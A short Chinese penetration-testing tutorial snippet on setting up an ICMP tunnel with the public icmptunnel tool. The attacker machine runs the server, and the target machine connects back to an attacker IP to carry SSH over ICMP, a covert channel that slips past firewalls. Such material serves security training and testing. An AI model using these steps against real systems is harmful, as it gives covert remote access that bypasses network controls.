利用
攻击机下载客户端并编译:
git clone https://github.com/jamesbarlow/icmptunnel.git
cd icmptunnel/
make
./icmptunnel -s 开启服务 ./icmptunnel -s & 可实现放置到后台
/sbin/ifconfig tun0 10.10.10.1 netmask 255.255.255.0 另一窗口新做张网卡
目标机连接攻击机:
./icmptunnel 192.168.3.130
/sbin/ifconfig tun0 10.10.10.10 netmask 255.255.255.0 同样
另一窗口新做张网卡
现在,已经有一个端到端基于ICMP数据包的隧道了,服务端10.10.10.1,客户端10.10.10.10
SSH均可成功连接: